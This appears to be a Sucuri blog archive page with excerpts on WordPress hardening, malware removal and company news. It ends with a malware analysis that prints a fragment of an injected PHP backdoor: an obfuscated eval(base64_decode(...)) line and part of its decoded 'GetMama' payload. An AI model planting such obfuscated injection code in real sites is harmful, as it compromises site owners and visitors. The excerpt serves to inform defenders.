You often hear the question, “Which plugins should I use to secure WordPress?” It is a valid question, but it is not the best approach if that is the only question you are asking or the only action you are taking. If you are leaving the security of your blog in the hands of [...]
Website Malware Removal – WordPress Tips & Tricks
We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics? That’s what I want to cover in this post. All those things that you should know [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
I put together a post this weekend about my personal experience installing a WordPress site on a clean server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
Every day we service 100’s of clients and the question is always asked: “How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How To: Lock Down WordPress Admin Panel With a Dynamic IP
There is often a lot of discussion around locking down access to WP-ADMIN and WP-Login.php, especially around restricting it by IP. The issue and retort that often comes up is, “but what if I have a dynamic IP?” Right away the response from folks is, “oh, well then this won’t work for me.” It didn’t [...]
3 Easy Steps to Make WordPress Updates Safer
With the release of WordPress 3.4 inching closer (could be minutes), we wanted to put together a quick post to help you towards a successful update. Here are a few areas to help you prepare for an easy update to the latest and greatest version of WordPress: 1. Backup your website Updates in WordPress these [...]
Sucuri Gets a Facelift
It’s funny, Andrew Warner of Mixergy was recently conducting an interview and in it he brought up Sucuri. One of the things he said was: “Those guys at Sucuri must be doing well, you couldn’t tell from their site though…” That made us chuckle as we have been in the process of revamping a number [...]
Sponsoring WordCamp Orange County 2012
We are very happy to help our local organizers with this year’s WordCamp Orange County by offering some financial support. If past years are any sign of what is to come, it should be a great opportunity for all WordPress enthusiasts to come together and share what we have learned over the past
Sucuri at WordCamp San Diego 2012
Game on folks! Sucuri is proud to be a part of WordCamp San Diego 2012. Both Dre and Tony are two of the organizers of the event and can be found roaming the halls wearing their cool WordCamp San Diego jerseys! Here they are getting ready to have a good time!
New Malware – Eval + GetMama + Encoded Javascript
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts: 1- ALL PHP files with an eval (base64_decode line of code: /*god_mode_on*/eval (base64_decode("ZXZhbC hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0 phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2 JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2- That long piece of code, once executed gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]